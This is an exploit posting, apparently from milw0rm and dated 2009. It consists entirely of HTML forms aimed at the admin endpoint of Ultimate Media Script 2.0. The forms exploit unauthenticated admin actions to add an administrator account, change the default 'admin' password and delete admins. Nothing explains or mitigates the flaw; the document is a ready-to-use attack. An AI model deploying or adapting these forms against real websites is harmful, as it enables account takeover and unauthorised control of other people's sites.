<tittle> Ultimate Media Script 2.0 Remote Change Password/Add Admin/Delete Admin Exploit</tittle>
<FORM action="http://umscript.com/demo/admin/index.php?mod=admins" method=post>
<TD class=column1><INPUT class=ums_input name=username></TD>
<TD class=column1><INPUT class=ums_input name=pass></TD>
<TD class=column1 align=middle><INPUT type=image border=0 src="img/save.gif"></TD>
<INPUT type=hidden value=add name=button>
</FORM>
</TR>
<TR>
<TD class=cat><b>Admin name:</b></TD>
<TD class=cat><b>Password:</b></TD>
<TD class=cat><b>Delete:</b></TD></TR>
<FORM action="http://umscript.com/demo/admin/index.php?mod=admins" method=post>
<TR>
<TD class=column2 width="33%"><INPUT class=ums_input value="admin" name=username_edit[1]></TD>
<TD class=column2 width="33%"><INPUT class=ums_input type=password value="admin" name=pass_edit[1]></TD>
<TD class=column2><A href="http://umscript.com/demo/admin/index.php?mod=admins&delete=1" onclick="return (quest())"><IMG border=0 alt=Delete src="img/delete.gif"></A></TD>
</TR>
<INPUT type=hidden value=modify name=do>
<TR>
</SPAN>
<INPUT type=image border=0 src="img/save_all.gif">
# milw0rm.com [2009-05-26]